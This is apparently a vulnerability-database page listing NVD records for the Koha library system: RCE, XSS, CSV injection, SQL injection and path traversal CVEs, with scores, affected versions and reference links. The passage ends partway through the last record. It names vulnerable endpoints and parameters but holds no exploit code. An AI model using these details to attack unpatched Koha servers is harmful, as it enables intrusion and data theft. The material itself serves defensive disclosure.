Vulnerabilites related to Koha - Koha
Vulnerability from fkie_nvd
Published
2024-08-06 19:15
Modified
2024-08-12 18:18
Severity ?
7.2 (High) - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
9.6 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
9.6 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
Summary
An issue in Koha ILS 23.05 and before allows a remote attacker to execute arbitrary code via a crafted script to the format parameter.
References
| ▼ | URL | Tags | |
|---|---|---|---|
| cve@mitre.org | https://febin0x4e4a.wordpress.com/2024/03/07/xss-to-one-click-rce-in-koha-ils/ | Exploit, Third Party Advisory |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
"matchCriteriaId": "805198C0-742F-4F3E-90F3-C6C290795A5E",
"versionEndIncluding": "23.05.00",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "An issue in Koha ILS 23.05 and before allows a remote attacker to execute arbitrary code via a crafted script to the format parameter."
},
{
"lang": "es",
"value": "Un problema en Koha ILS 23.05 y anteriores permite a un atacante remoto ejecutar c\u00f3digo arbitrario a trav\u00e9s de un script manipulado en el par\u00e1metro de formato."
}
],
"id": "CVE-2024-28739",
"lastModified": "2024-08-12T18:18:17.717",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.2,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.6,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 6.0,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
]
},
"published": "2024-08-06T19:15:56.287",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://febin0x4e4a.wordpress.com/2024/03/07/xss-to-one-click-rce-in-koha-ils/"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-77"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"description": [
{
"lang": "en",
"value": "CWE-79"
}
],
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
]
}
Vulnerability from fkie_nvd
Published
2024-02-12 22:15
Modified
2025-09-29 15:16
Severity ?
8.0 (High) - CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H
8.8 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
8.8 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Summary
CSV Injection vulnerability in '/members/moremember.pl' and '/admin/aqbudgets.pl' endpoints in Koha Library Management System version 23.05.05 and earlier allows attackers to to inject DDE commands into csv exports via the 'Budget' and 'Patrons Member' components.
References
| ▼ | URL | Tags | |
|---|---|---|---|
| cve@mitre.org | https://nitipoom-jar.github.io/CVE-2024-24337/ | Exploit, Third Party Advisory | |
| cve@mitre.org | https://nitipoom-jaroonchaipipat.github.io/security-research-portal/2024-24337 | ||
| af854a3a-2127-422b-91ae-364da2661108 | https://nitipoom-jar.github.io/CVE-2024-24337/ | Exploit, Third Party Advisory |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5079FA23-5E5B-4D7C-BC8B-ECF0E7BB8069",
"versionEndIncluding": "23.05.05",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "CSV Injection vulnerability in \u0027/members/moremember.pl\u0027 and \u0027/admin/aqbudgets.pl\u0027 endpoints in Koha Library Management System version 23.05.05 and earlier allows attackers to to inject DDE commands into csv exports via the \u0027Budget\u0027 and \u0027Patrons Member\u0027 components."
},
{
"lang": "es",
"value": "Vulnerabilidad de inyecci\u00f3n CSV en los endpoints \u0027/members/moremember.pl\u0027 y \u0027/admin/aqbudgets.pl\u0027 en Koha Library Management System versi\u00f3n 23.05.05 y anteriores permite a los atacantes inyectar comandos DDE en exportaciones csv a trav\u00e9s de los componentes \u0027Budget\u0027 y \u0027Patrons Member\u0027."
}
],
"id": "CVE-2024-24337",
"lastModified": "2025-09-29T15:16:05.927",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.0,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.1,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
]
},
"published": "2024-02-12T22:15:08.430",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://nitipoom-jar.github.io/CVE-2024-24337/"
},
{
"source": "cve@mitre.org",
"url": "https://nitipoom-jaroonchaipipat.github.io/security-research-portal/2024-24337"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://nitipoom-jar.github.io/CVE-2024-24337/"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-1236"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"description": [
{
"lang": "en",
"value": "CWE-1236"
}
],
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
]
}
Vulnerability from fkie_nvd
Published
2024-08-06 19:15
Modified
2024-08-21 18:35
Severity ?
9.6 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
6.1 (Medium) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
6.1 (Medium) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Summary
Cross Site Scripting vulnerability in Koha ILS 23.05 and before allows a remote attacker to execute arbitrary code via the additonal-contents.pl component.
References
| ▼ | URL | Tags | |
|---|---|---|---|
| cve@mitre.org | https://febin0x4e4a.wordpress.com/2023/01/11/xss-vulnerability-in-koha-integrated-library-system/ | Exploit, Third Party Advisory | |
| cve@mitre.org | https://febin0x4e4a.wordpress.com/2024/03/07/xss-to-one-click-rce-in-koha-ils/ | Exploit, Third Party Advisory |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
"matchCriteriaId": "805198C0-742F-4F3E-90F3-C6C290795A5E",
"versionEndIncluding": "23.05.00",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Cross Site Scripting vulnerability in Koha ILS 23.05 and before allows a remote attacker to execute arbitrary code via the additonal-contents.pl component."
},
{
"lang": "es",
"value": "Vulnerabilidad de Cross-Site Scripting en Koha ILS 23.05 y anteriores permite a un atacante remoto ejecutar c\u00f3digo arbitrario a trav\u00e9s del componente additonal-contents.pl."
}
],
"id": "CVE-2024-28740",
"lastModified": "2024-08-21T18:35:02.877",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.6,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 6.0,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
]
},
"published": "2024-08-06T19:15:56.380",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://febin0x4e4a.wordpress.com/2023/01/11/xss-vulnerability-in-koha-integrated-library-system/"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://febin0x4e4a.wordpress.com/2024/03/07/xss-to-one-click-rce-in-koha-ils/"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-79"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"description": [
{
"lang": "en",
"value": "CWE-79"
}
],
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
]
}
Vulnerability from fkie_nvd
Published
2018-10-18 21:29
Modified
2024-11-21 02:31
Severity ?
Summary
Multiple SQL injection vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow (1) remote attackers to execute arbitrary SQL commands via the number parameter to opac-tags_subject.pl in the OPAC interface or (2) remote authenticated users to execute arbitrary SQL commands via the Filter or (3) Criteria parameter to reports/borrowers_out.pl in the Staff interface.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
"matchCriteriaId": "214E9AA7-580C-4028-AB21-0D723D3037FD",
"versionEndExcluding": "3.14.16",
"versionStartIncluding": "3.14.00",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
"matchCriteriaId": "CEBF9831-C8D6-4503-8192-13D04FB057DB",
"versionEndExcluding": "3.16.12",
"versionStartIncluding": "3.16.00",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E6E51D4D-9FD8-44A8-8FB0-4880927429D1",
"versionEndExcluding": "3.18.08",
"versionStartIncluding": "3.18.00",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3EBE685F-DE28-42F4-A071-0A14DE61D0C0",
"versionEndExcluding": "3.20.01",
"versionStartIncluding": "3.20.00",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Multiple SQL injection vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow (1) remote attackers to execute arbitrary SQL commands via the number parameter to opac-tags_subject.pl in the OPAC interface or (2) remote authenticated users to execute arbitrary SQL commands via the Filter or (3) Criteria parameter to reports/borrowers_out.pl in the Staff interface."
},
{
"lang": "es",
"value": "M\u00faltiples vulnerabilidades Cross-Site Scripting (XSS) en Koha, en versiones 3.14.x anteriores a la 3.14.16, versiones 3.16.x anteriores a la 3.16.12, versiones 3.18.x anteriores a la 3.18.08 y versiones 3.20.x anteriores a la 3.20.1, permiten (1) que atacantes remotos ejecuten comandos SQL arbitrarios mediante el par\u00e1metro number en opac-tags_subject.pl en la interfaz OPAC o (2) que usuarios autenticados remotos ejecuten comandos SQL arbitrarios mediante los par\u00e1metros Filter o (3) Criteria en reports/borrowers_out.pl en la interfaz Staff."
}
],
"id": "CVE-2015-4633",
"lastModified": "2024-11-21T02:31:26.750",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2018-10-18T21:29:01.800",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes"
],
"url": "https://koha-community.org/koha-3-14-16-released/"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes"
],
"url": "https://koha-community.org/security-release-koha-3-16-12/"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes"
],
"url": "https://koha-community.org/security-release-koha-3-18-8/"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes"
],
"url": "https://koha-community.org/security-release-koha-3-20-1/"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "https://packetstormsecurity.com/files/132458/Koha-ILS-3.20.x-CSRF-XSS-Traversal-SQL-Injection.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Mailing List",
"Third Party Advisory"
],
"url": "https://seclists.org/fulldisclosure/2015/Jun/80"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "https://www.exploit-db.com/exploits/37387/"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Release Notes",
"Third Party Advisory"
],
"url": "https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes"
],
"url": "https://koha-community.org/koha-3-14-16-released/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes"
],
"url": "https://koha-community.org/security-release-koha-3-16-12/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes"
],
"url": "https://koha-community.org/security-release-koha-3-18-8/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes"
],
"url": "https://koha-community.org/security-release-koha-3-20-1/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "https://packetstormsecurity.com/files/132458/Koha-ILS-3.20.x-CSRF-XSS-Traversal-SQL-Injection.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Mailing List",
"Third Party Advisory"
],
"url": "https://seclists.org/fulldisclosure/2015/Jun/80"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "https://www.exploit-db.com/exploits/37387/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Release Notes",
"Third Party Advisory"
],
"url": "https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-89"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2020-01-24 17:15
Modified
2024-11-21 02:05
Severity ?
Summary
The MARC framework import/export function (admin/import_export_framework.pl) in Koha before 3.8.23, 3.10.x before 3.10.13, 3.12.x before 3.12.10, and 3.14.x before 3.14.3 does not require authentication, which allows remote attackers to conduct SQL injection attacks via unspecified vectors.
References
| ▼ | URL | Tags | |
|---|---|---|---|
| cve@mitre.org | http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11666 | Exploit, Issue Tracking, Vendor Advisory | |
| cve@mitre.org | http://koha-community.org/security-release-february-2014/ | Vendor Advisory | |
| cve@mitre.org | http://www.openwall.com/lists/oss-security/2014/02/07/10 | Mailing List, Third Party Advisory | |
| cve@mitre.org | http://www.openwall.com/lists/oss-security/2014/02/10/3 | Mailing List, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11666 | Exploit, Issue Tracking, Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | http://koha-community.org/security-release-february-2014/ | Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.openwall.com/lists/oss-security/2014/02/07/10 | Mailing List, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.openwall.com/lists/oss-security/2014/02/10/3 | Mailing List, Third Party Advisory |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
"matchCriteriaId": "217F4C5D-055C-43AA-983A-51CF9408B213",
"versionEndExcluding": "3.08.23",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
"matchCriteriaId": "9D66E4EE-C4FC-411F-957B-F21A618EBC7E",
"versionEndExcluding": "3.10.13",
"versionStartIncluding": "3.10.00",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
"matchCriteriaId": "173A2792-F4A9-4378-9CA7-6FAE08D75492",
"versionEndExcluding": "3.12.10",
"versionStartIncluding": "3.12.00",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2DE8FEB3-A97F-4F8C-A5FC-4B70E6E08859",
"versionEndExcluding": "3.14.03",
"versionStartIncluding": "3.14.00",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "The MARC framework import/export function (admin/import_export_framework.pl) in Koha before 3.8.23, 3.10.x before 3.10.13, 3.12.x before 3.12.10, and 3.14.x before 3.14.3 does not require authentication, which allows remote attackers to conduct SQL injection attacks via unspecified vectors."
},
{
"lang": "es",
"value": "La funci\u00f3n MARC framework import/export (archivo admin/import_export_framework.pl) en Koha versiones anteriores a 3.8.23, versiones 3.10.x anteriores a 3.10.13, versiones 3.12.x anteriores a 3.12.10 y versiones 3.14.x anteriores a 3.14.3, no requiere autenticaci\u00f3n, lo que permite a atacantes remotos llevar a cabo ataques de inyecci\u00f3n SQL por medio de vectores no especificados."
}
],
"id": "CVE-2014-1924",
"lastModified": "2024-11-21T02:05:17.070",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2020-01-24T17:15:12.327",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11666"
},
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "http://koha-community.org/security-release-february-2014/"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2014/02/07/10"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2014/02/10/3"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11666"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "http://koha-community.org/security-release-february-2014/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2014/02/07/10"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2014/02/10/3"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-89"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2020-01-24 17:15
Modified
2024-11-21 02:05
Severity ?
Summary
Absolute path traversal vulnerability in tools/pdfViewer.pl in Koha before 3.8.23, 3.10.x before 3.10.13, 3.12.x before 3.12.10, and 3.14.x before 3.14.3 allows remote attackers to read arbitrary files via unspecified vectors.
References
| ▼ | URL | Tags | |
|---|---|---|---|
| cve@mitre.org | http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11660 | Exploit, Issue Tracking, Vendor Advisory | |
| cve@mitre.org | http://koha-community.org/security-release-february-2014/ | Vendor Advisory | |
| cve@mitre.org | http://www.openwall.com/lists/oss-security/2014/02/07/10 | Mailing List, Third Party Advisory | |
| cve@mitre.org | http://www.openwall.com/lists/oss-security/2014/02/10/3 | Mailing List, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11660 | Exploit, Issue Tracking, Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | http://koha-community.org/security-release-february-2014/ | Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.openwall.com/lists/oss-security/2014/02/07/10 | Mailing List, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.openwall.com/lists/oss-security/2014/02/10/3 | Mailing List, Third Party Advisory |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
"matchCriteriaId": "217F4C5D-055C-43AA-983A-51CF9408B213",
"versionEndExcluding": "3.08.23",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
"matchCriteriaId": "9D66E4EE-C4FC-411F-957B-F21A618EBC7E",
"versionEndExcluding": "3.10.13",
"versionStartIncluding": "3.10.00",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
"matchCriteriaId": "173A2792-F4A9-4378-9CA7-6FAE08D75492",
"versionEndExcluding": "3.12.10",
"versionStartIncluding": "3.12.00",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2DE8FEB3-A97F-4F8C-A5FC-4B70E6E08859",
"versionEndExcluding": "3.14.03",
"versionStartIncluding": "3.14.00",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Absolute path traversal vulnerability in tools/pdfViewer.pl in Koha before 3.8.23, 3.10.x before 3.10.13, 3.12.x before 3.12.10, and 3.14.x before 3.14.3 allows remote attackers to read arbitrary files via unspecified vectors."
},
{
"lang": "es",
"value": "Una vulnerabilidad de salto de ruta en el archivo tools/pdfViewer.pl en Koha versiones anteriores a 3.8.23, versiones 3.10.x anteriores a 3.10.13, versiones 3.12.x anteriores a 3.12.10 y versiones 3.14.x anteriores a 3.14.3, permite a atacantes remotos leer archivos arbitrarios por medio de vectores no especificados"
}
],
"id": "CVE-2014-1922",
"lastModified": "2024-11-21T02:05:16.780",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2020-01-24T17:15:12.173",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11660"
},
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "http://koha-community.org/security-release-february-2014/"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2014/02/07/10"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
